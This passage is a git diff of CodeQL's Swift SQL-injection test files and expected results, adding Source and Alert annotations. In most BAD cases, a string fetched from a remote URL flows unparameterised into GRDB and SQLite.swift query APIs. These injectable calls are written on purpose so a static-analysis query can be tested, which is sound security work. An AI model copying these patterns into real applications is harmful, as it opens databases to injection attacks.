row.fetchOne(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchOne(stmt, sql: localString, adapter: nil) // GOOD row.fetchOne(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - row.fetchSet(stmt, sql: remoteString) // BAD - row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchSet(stmt, sql: remoteString) // BAD // $ Alert + row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchSet(stmt, sql: localString) // GOOD row.fetchSet(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchSet(stmt, sql: localString, adapter: nil) // GOOD @@ -288,39 +288,39 @@ func test(row: Row, stmt: Statement) throws { func test(databaseValueConvertible: DatabaseValueConvertible, stmt: Statement) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - databaseValueConvertible.fetchCursor(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchCursor(stmt, sql: localString) // GOOD databaseValueConvertible.fetchCursor(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchCursor(stmt, sql: localString, adapter: nil) // GOOD databaseValueConvertible.fetchCursor(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - databaseValueConvertible.fetchAll(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchAll(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchAll(stmt, sql: localString) // GOOD databaseValueConvertible.fetchAll(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchAll(stmt, sql: localString, adapter: nil) // GOOD databaseValueConvertible.fetchAll(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - databaseValueConvertible.fetchOne(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchOne(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchOne(stmt, sql: localString) // GOOD databaseValueConvertible.fetchOne(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchOne(stmt, sql: localString, adapter: nil) // GOOD databaseValueConvertible.fetchOne(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - databaseValueConvertible.fetchSet(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchSet(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchSet(stmt, sql: localString) // GOOD databaseValueConvertible.fetchSet(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchSet(stmt, sql: localString, adapter: nil) // GOOD @@ -329,26 +329,26 @@ func test(databaseValueConvertible: DatabaseValueConvertible, stmt: Statement) t func testSqlStatementCursor(database: Database) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments()) // BAD - let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments(), prepFlags: 0) // BAD + let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments(), prepFlags: 0) // BAD // $ Alert let _ = SQLStatementCursor(database: database, sql: localString, arguments: StatementArguments()) // GOOD let _ = SQLStatementCursor(database: database, sql: localString, arguments: StatementArguments(), prepFlags: 0) // GOOD } func testCommonTableExpression() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) - - let _ = CommonTableExpression(named: "", sql: remoteString) // BAD - let _ = CommonTableExpression(named: "", sql: remoteString, arguments: StatementArguments()) // BAD - let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString) // BAD - let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD - let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString) // BAD - let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString) // BAD - let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString, arguments: StatementArguments()) // BAD - let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source + + let _ = CommonTableExpression(named: "", sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(named: "", sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = CommonTableExpression(named: "", sql: localString) // GOOD let _ = CommonTableExpression(named: "", sql: localString, arguments: StatementArguments()) // GOOD let _ = CommonTableExpression(named: "", columns: [""], sql: localString) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift b/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift index f9a6b41340ce..034e980ae217 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift @@ -59,7 +59,7 @@ class Connection { func test_sqlite_swift_api(db: Connection) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source let remoteNumber = Int(remoteString) ?? 0 let unsafeQuery1 = remoteString @@ -70,9 +70,9 @@ func test_sqlite_swift_api(db: Connection) throws { // --- execute --- - try db.execute(unsafeQuery1) // BAD - try db.execute(unsafeQuery2) // BAD - try db.execute(unsafeQuery3) // BAD + try db.execute(unsafeQuery1) // BAD // $ Alert + try db.execute(unsafeQuery2) // BAD // $ Alert + try db.execute(unsafeQuery3) // BAD // $ Alert try db.execute(safeQuery1) // GOOD try db.execute(safeQuery2) // GOOD @@ -80,7 +80,7 @@ func test_sqlite_swift_api(db: Connection) throws { let varQuery = "SELECT * FROM users WHERE username=?" - let stmt1 = try db.prepare(unsafeQuery3) // BAD + let stmt1 = try db.prepare(unsafeQuery3) // BAD // $ Alert try stmt1.run() let stmt2 = try db.prepare(varQuery, localString) // GOOD @@ -92,31 +92,31 @@ func test_sqlite_swift_api(db: Connection) throws { let stmt4 = try Statement(db, localString) // GOOD try stmt4.run() - let stmt5 = try Statement(db, remoteString) // BAD + let stmt5 = try Statement(db, remoteString) // BAD // $ Alert try stmt5.run() // --- more variants --- - let stmt6 = try db.prepare(unsafeQuery1, "") // BAD + let stmt6 = try db.prepare(unsafeQuery1, "") // BAD // $ Alert try stmt6.run() - let stmt7 = try db.prepare(unsafeQuery1, [""]) // BAD + let stmt7 = try db.prepare(unsafeQuery1, [""]) // BAD // $ Alert try stmt7.run() - let stmt8 = try db.prepare(unsafeQuery1, ["username": ""]) // BAD + let stmt8 = try db.prepare(unsafeQuery1, ["username": ""]) // BAD // $ Alert try stmt8.run() - try db.run(unsafeQuery1, "") // BAD + try db.run(unsafeQuery1, "") // BAD // $ Alert - try db.run(unsafeQuery1, [""]) // BAD + try db.run(unsafeQuery1, [""]) // BAD // $ Alert - try db.run(unsafeQuery1, ["username": ""]) // BAD + try db.run(unsafeQuery1, ["username": ""]) // BAD // $ Alert - try db.scalar(unsafeQuery1, "") // BAD + try db.scalar(unsafeQuery1, "") // BAD // $ Alert - try db.scalar(unsafeQuery1, [""]) // BAD + try db.scalar(unsafeQuery1, [""]) // BAD // $ Alert - try db.scalar(unsafeQuery1, ["username": ""]) // BAD + try db.scalar(unsafeQuery1, ["username": ""]) // BAD // $ Alert let stmt9 = try db.prepare(varQuery) // GOOD try stmt9.bind(remoteString) // GOOD @@ -129,5 +129,5 @@ func test_sqlite_swift_api(db: Connection) throws { try stmt9.scalar([remoteString]) // GOOD try stmt9.scalar(["username": remoteString]) // GOOD - try Statement(db, remoteString).run() // BAD + try Statement(db, remoteString).run() // BAD // $ Alert } diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 36ebcd04a6ee..9e91919d5c57 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -1,3 +1,117 @@ +#select +| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:335:57:335:57 